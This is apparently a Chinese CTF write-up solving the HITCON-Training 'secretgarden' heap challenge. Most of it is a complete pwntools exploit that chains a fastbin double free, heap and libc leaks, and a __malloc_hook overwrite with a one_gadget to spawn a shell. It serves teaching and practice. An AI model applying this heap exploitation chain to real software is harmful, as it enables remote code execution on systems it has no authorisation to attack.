
    HITCON-Training lab12 secretgarden fastbin attack

    December 17, 2020 • Read: 874 • Pwn

    本来是在看Angelboy的视频来着,看到他有这个例题于是我就去github找,做完了才发现原来lab虽然序号一样,但是好像主题不是同一个。
    阴差阳错做了这题,既然做了就放出来吧,不过我的写法不是最优写法。
    题目中也有magic函数,但是我没用。

    from pwn import *
    from LibcSearcher import *
    # pwntools setup: trace every byte exchanged with the target process.
    context(log_level="debug")
    # Local run of the challenge binary from the working directory.
    r = process(["./secretgarden"])
    #r = remote("training.pwnable.tw", 11012)
    def choice(idx):
        """Reply to the program's menu prompt with option number *idx*."""
        option = str(idx)
        r.sendlineafter("Your choice : ", option)
    
    def add(size, name = 'a', color = 'a'):
        """Menu option 1: create a flower.

        *size* is sent as the name length, *name* is sent raw (no trailing
        newline) and *color* is sent as a full line, each after its prompt.
        """
        choice(1)
        steps = [
            ("Length of the name :", str(size), True),
            ("The name of flower :", name, False),
            ("The color of the flower :", color, True),
        ]
        for prompt, payload, with_newline in steps:
            if with_newline:
                r.sendlineafter(prompt, payload)
            else:
                r.sendafter(prompt, payload)
    
    def visit():
        """Menu option 2: make the program list the flowers it holds."""
        r.sendlineafter("Your choice : ", str(2))
    
    def delete(idx):
        """Menu option 3: remove flower number *idx* from the garden."""
        prompt = "Which flower do you want to remove from the garden:"
        choice(3)
        r.sendlineafter(prompt, str(idx))
    
    def clean():
        """Menu option 4: the program's clean-up action."""
        r.sendlineafter("Your choice : ", str(4))
    
    # NOTE(review): this script is written for Python 2 pwntools — str literals
    # are concatenated with p64() output and used as ljust() fill characters;
    # under Python 3 those would raise TypeError without b'' literals.
    add(0x68) #0
    add(0x68) #1
    add(0x68) #2
    
    #double free
    delete(0)
    delete(1)
    delete(0)
    
    #fastbin attack & change size to 0xA1 for unsorted bin
    add(0x68, '\x40') #3 == 0
    add(0x68) #4 == 1
    visit()
    # visit() echoes the flower names; the bytes printed after 'flower[3] :'
    # up to the newline are read as a little-endian 64-bit value.
    r.recvuntil('flower[3] :')
    heap_addr = u64(r.recvuntil('\n')[:-1].ljust(8, '\x00'))
    log.success('heap_addr: ' + hex(heap_addr))
    add(0x68, p64(heap_addr + 0x60) + 'b' * 0x50 + p64(0x71) + p64(heap_addr + 0x60)) #5
    add(0x68, '\x00') #6
    add(0x68, p64(0) + p64(0x31) + p64(0) + p64(heap_addr + 0xB0) + '\x11' * 0x18 + p64(0xA1)) #7
    delete(1)
    add(0x68, p64(0) + p64(0x31) + p64(1) + p64(heap_addr + 0xE0)) #8
    visit()
    
    #unsorted bin leak
    # Reads up to the first 0x7f byte and takes the 6 bytes ending there as a
    # pointer. The 88 and 0x10 offsets are glibc-build specific — TODO confirm
    # they match the libc LibcSearcher selects below.
    main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88
    log.success('main_arena_addr: ' + hex(main_arena_addr))
    malloc_hook_addr = main_arena_addr - 0x10
    log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))
    # LibcSearcher picks a libc build from the leaked __malloc_hook address;
    # nothing here verifies that the hard-coded offsets in `one` belong to the
    # same build, so a mismatch only shows up as a failed final step.
    libc = LibcSearcher('__malloc_hook', malloc_hook_addr)
    libc_base = malloc_hook_addr - libc.dump('__malloc_hook')
    log.success('libc_base: ' + hex(libc_base))
    one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
    one_gadget = libc_base + one[2]
    log.success('one_gadget: ' + hex(one_gadget))
    
    #getshell
    add(0x68) #9
    add(0x68) #10
    delete(9)
    delete(10)
    delete(9)
    add(0x68, p64(malloc_hook_addr - 0x23))
    add(0x68)
    add(0x68)
    add(0x68, 'a' * 0x13 + p64(one_gadget))
    delete(9)
    delete(9)
    
    r.interactive()